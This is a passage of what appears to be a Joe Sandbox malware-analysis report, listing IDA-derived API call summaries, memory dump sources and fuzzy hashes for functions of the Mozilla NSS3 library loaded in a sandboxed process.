                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11316D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                              • String ID:
                                                              • API String ID: 3383223490-0
                                                              • Opcode ID: 2680ad8cec9995086a1d9f8bec537b44062629bbc3d8608eeff6ac1a8b942574
                                                              • Instruction ID: 04323c3912e41c4869e4a5fd354d675b455e71bcbbb66e05ae1cb4d760c78671
                                                              • Opcode Fuzzy Hash: 2680ad8cec9995086a1d9f8bec537b44062629bbc3d8608eeff6ac1a8b942574
                                                              • Instruction Fuzzy Hash: C4F1BFB5D042099FDF11DFA4DC45BAEBBB4BF0A318F054168EC04A7219E771E996CB81
                                                              APIs
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6D116943
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6D116957
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6D116972
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6D116983
                                                                • Part of subcall function 6D116910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6D1169AA
                                                                • Part of subcall function 6D116910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6D1169BE
                                                                • Part of subcall function 6D116910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6D1169D2
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6D1169DF
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgStrip.NSS3(?), ref: 6D116A5B
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D116D8C
                                                              • free.MOZGLUE(00000000), ref: 6D116DC5
                                                              • free.MOZGLUE(?), ref: 6D116DD6
                                                              • free.MOZGLUE(?), ref: 6D116DE7
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D116E1F
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116E4B
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116E72
                                                              • free.MOZGLUE(?), ref: 6D116EA7
                                                              • free.MOZGLUE(?), ref: 6D116EC4
                                                              • free.MOZGLUE(?), ref: 6D116ED5
                                                              • free.MOZGLUE(00000000), ref: 6D116EE3
                                                              • free.MOZGLUE(?), ref: 6D116EF4
                                                              • free.MOZGLUE(?), ref: 6D116F08
                                                              • free.MOZGLUE(00000000), ref: 6D116F35
                                                              • free.MOZGLUE(?), ref: 6D116F44
                                                              • free.MOZGLUE(?), ref: 6D116F5B
                                                              • free.MOZGLUE(00000000), ref: 6D116F65
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6D11781D,00000000,6D10BE2C,?,6D116B1D,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C40
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6D11781D,?,6D10BE2C,?), ref: 6D116C58
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C6F
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6D116C84
                                                                • Part of subcall function 6D116C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6D116C96
                                                                • Part of subcall function 6D116C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6D116CAA
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116F90
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116FC5
                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6D116FF4
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                              • String ID:
                                                              • API String ID: 1304971872-0
                                                              • Opcode ID: 3c9f0f6b65c896d2f41374976a68957363f1bbb3658627439c32eb7cf8dbe36e
                                                              • Instruction ID: d1527ce3368fbe476a157c29ea0967cd4d9407c75f1f691ed882d23eb0a7bf2a
                                                              • Opcode Fuzzy Hash: 3c9f0f6b65c896d2f41374976a68957363f1bbb3658627439c32eb7cf8dbe36e
                                                              • Instruction Fuzzy Hash: 8EB14CB1E0921E9FDF11CBA5DC44BAEBBB8BF15644F040134E815A7248E7B2E914CBE1
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D114C4C
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D114C60
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6D114CA1
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6D114CBE
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D114CD2
                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D114D3A
                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D114D4F
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6D114DB7
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              • TlsGetValue.KERNEL32 ref: 6D114DD7
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D114DEC
                                                              • PR_Unlock.NSS3(?), ref: 6D114E1B
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D114E2F
                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D114E5A
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D114E71
                                                              • free.MOZGLUE(00000000), ref: 6D114E7A
                                                              • PR_Unlock.NSS3(?), ref: 6D114EA2
                                                              • TlsGetValue.KERNEL32 ref: 6D114EC1
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D114ED6
                                                              • PR_Unlock.NSS3(?), ref: 6D114F01
                                                              • free.MOZGLUE(00000000), ref: 6D114F2A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                              • String ID:
                                                              • API String ID: 759471828-0
                                                              • Opcode ID: 77921d4920b5e25d6fa0fbbb6780877121ed4a54ce7daaf3fb7db7788c323e37
                                                              • Instruction ID: 33648f6d164f67818f65f923a471a366f48b3fa65796ff6f16039a166adffbb0
                                                              • Opcode Fuzzy Hash: 77921d4920b5e25d6fa0fbbb6780877121ed4a54ce7daaf3fb7db7788c323e37
                                                              • Instruction Fuzzy Hash: E9B1FEB5A082069FEF11DF68DC88BAA77B4BF09718F024038ED1597354E7B4E961CB91
                                                              APIs
                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0E5DEC
                                                              • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6D0E5E0F
                                                              • PORT_ZAlloc_Util.NSS3(00000828), ref: 6D0E5E35
                                                              • SECKEY_CopyPublicKey.NSS3(?), ref: 6D0E5E6A
                                                              • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6D0E5EC3
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6D0E5ED9
                                                              • SECKEY_SignatureLen.NSS3(?), ref: 6D0E5F09
                                                              • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6D0E5F49
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D0E5F89
                                                              • free.MOZGLUE(?), ref: 6D0E5FA0
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D0E5FB6
                                                              • free.MOZGLUE(00000000), ref: 6D0E5FBF
                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0E600C
                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0E6079
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D0E6084
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D0E6094
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                              • String ID:
                                                              • API String ID: 2310191401-3916222277
                                                              • Opcode ID: d31e008eecb1125d0320df19518d026c22b6533cfd41f4dc944ddf8a804ce92a
                                                              • Instruction ID: 93087b730c2d6c201e3be4d43847c7065a9c31493ec1f6d59796907b85232fe1
                                                              • Opcode Fuzzy Hash: d31e008eecb1125d0320df19518d026c22b6533cfd41f4dc944ddf8a804ce92a
                                                              • Instruction Fuzzy Hash: F981F179E042069FEB14CA64DC89B7FB7F4AF44394F054928E919A7391E771E900CBE1
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_Digest), ref: 6D106D86
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D106DB4
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D106DC3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D106DD9
                                                              • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6D106DFA
                                                              • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6D106E13
                                                              • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6D106E2C
                                                              • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6D106E47
                                                              • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6D106EB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                              • API String ID: 1003633598-2270781106
                                                              • Opcode ID: 879c9c54a02e93698499dbbbdf17d0dd476a06b1706fa1fff92770720a038231
                                                              • Instruction ID: 8ec6fd760e6203a8ccac96c61dd29a1cada1161f283ee9a042e507bd9ff4304d
                                                              • Opcode Fuzzy Hash: 879c9c54a02e93698499dbbbdf17d0dd476a06b1706fa1fff92770720a038231
                                                              • Instruction Fuzzy Hash: D441B479500108AFDB20EF55DE4CB5B3BB1AF9235CF068024FA085721ADFB19885CBE2
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_LoginUser), ref: 6D109C66
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D109C94
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D109CA3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D109CB9
                                                              • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6D109CDA
                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D109CF5
                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D109D10
                                                              • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6D109D29
                                                              • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6D109D42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                              APIs
                                                              • calloc.MOZGLUE(00000001,00000080), ref: 6D1E9C70
                                                              • PR_NewLock.NSS3 ref: 6D1E9C85
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                              • PR_NewCondVar.NSS3(00000000), ref: 6D1E9C96
                                                                • Part of subcall function 6D0BBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6D0C21BC), ref: 6D0BBB8C
                                                              • PR_NewLock.NSS3 ref: 6D1E9CA9
                                                                • Part of subcall function 6D1998D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D199946
                                                                • Part of subcall function 6D1998D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D0516B7,00000000), ref: 6D19994E
                                                                • Part of subcall function 6D1998D0: free.MOZGLUE(00000000), ref: 6D19995E
                                                              • PR_NewLock.NSS3 ref: 6D1E9CB9
                                                              • PR_NewLock.NSS3 ref: 6D1E9CC9
                                                              • PR_NewCondVar.NSS3(00000000), ref: 6D1E9CDA
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6D0BBBEB
                                                                • Part of subcall function 6D0BBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6D0BBBFB
                                                                • Part of subcall function 6D0BBB80: GetLastError.KERNEL32 ref: 6D0BBC03
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6D0BBC19
                                                                • Part of subcall function 6D0BBB80: free.MOZGLUE(00000000), ref: 6D0BBC22
                                                              • PR_NewCondVar.NSS3(?), ref: 6D1E9CF0
                                                              • PR_NewPollableEvent.NSS3 ref: 6D1E9D03
                                                                • Part of subcall function 6D1DF3B0: PR_CallOnce.NSS3(6D2314B0,6D1DF510), ref: 6D1DF3E6
                                                                • Part of subcall function 6D1DF3B0: PR_CreateIOLayerStub.NSS3(6D23006C), ref: 6D1DF402
                                                                • Part of subcall function 6D1DF3B0: PR_Malloc.NSS3(00000004), ref: 6D1DF416
                                                                • Part of subcall function 6D1DF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6D1DF42D
                                                                • Part of subcall function 6D1DF3B0: PR_SetSocketOption.NSS3(?), ref: 6D1DF455
                                                                • Part of subcall function 6D1DF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6D1DF473
                                                                • Part of subcall function 6D199890: TlsGetValue.KERNEL32(?,?,?,6D1997EB), ref: 6D19989E
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D1E9D78
                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6D1E9DAF
                                                              • _PR_CreateThread.NSS3(00000000,6D1E9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6D1E9D9F
                                                                • Part of subcall function 6D0BB3C0: TlsGetValue.KERNEL32 ref: 6D0BB403
                                                                • Part of subcall function 6D0BB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6D0BB459
                                                              • _PR_CreateThread.NSS3(00000000,6D1EA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6D1E9DE8
                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6D1E9DFC
                                                              • _PR_CreateThread.NSS3(00000000,6D1EA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6D1E9E29
                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6D1E9E3D
                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6D1E9E71
                                                              • PR_SetError.NSS3(FFFFE890,00000000), ref: 6D1E9E89
                                                              Similarity
                                                              • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                              • String ID:
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6D104CF3
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D104D28
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D104D37
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D104D4D
                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6D104D7B
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D104D8A
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D104DA0
                                                              • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6D104DBC
                                                              • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6D104E20
                                                              Strings
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_Verify), ref: 6D107CB6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D107CE4
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D107CF3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D107D09
                                                              • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6D107D2A
                                                              • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6D107D45
                                                              • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6D107D5E
                                                              • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6D107D77
                                                              Strings
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                              APIs
                                                              • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D19CC7B), ref: 6D19CD7A
                                                                • Part of subcall function 6D19CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6D10C1A8,?), ref: 6D19CE92
                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D19CDA5
                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D19CDB8
                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6D19CDDB
                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D19CD8E
                                                                • Part of subcall function 6D0C05C0: PR_EnterMonitor.NSS3 ref: 6D0C05D1
                                                                • Part of subcall function 6D0C05C0: PR_ExitMonitor.NSS3 ref: 6D0C05EA
                                                              • PR_LoadLibrary.NSS3(wship6.dll), ref: 6D19CDE8
                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D19CDFF
                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D19CE16
                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D19CE29
                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6D19CE48
                                                              Strings
                                                              Similarity
                                                              • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                              • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                              APIs
                                                              • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6D1E13BC,?,?,?,6D1E1193), ref: 6D1E1C6B
                                                              • PR_NewLock.NSS3(?,6D1E1193), ref: 6D1E1C7E
                                                                • Part of subcall function 6D1998D0: calloc.MOZGLUE(00000001,00000084,6D0C0936,00000001,?,6D0C102C), ref: 6D1998E5
                                                              • PR_NewCondVar.NSS3(00000000,?,6D1E1193), ref: 6D1E1C91
                                                                • Part of subcall function 6D0BBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6D0C21BC), ref: 6D0BBB8C
                                                              • PR_NewCondVar.NSS3(00000000,?,?,6D1E1193), ref: 6D1E1CA7
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6D0BBBEB
                                                                • Part of subcall function 6D0BBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6D0BBBFB
                                                                • Part of subcall function 6D0BBB80: GetLastError.KERNEL32 ref: 6D0BBC03
                                                                • Part of subcall function 6D0BBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6D0BBC19
                                                                • Part of subcall function 6D0BBB80: free.MOZGLUE(00000000), ref: 6D0BBC22
                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,6D1E1193), ref: 6D1E1CBE
                                                              • PR_NewCondVar.NSS3(00000000,?,?,?,?,6D1E1193), ref: 6D1E1CD4
                                                              • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6D1E1193), ref: 6D1E1CFE
                                                              • PR_Lock.NSS3(?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D1A
                                                                • Part of subcall function 6D199BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D0C1A48), ref: 6D199BB3
                                                                • Part of subcall function 6D199BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D0C1A48), ref: 6D199BC8
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D3D
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,6D1E1193), ref: 6D1E1D4E
                                                              • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6D1E1193), ref: 6D1E1D64
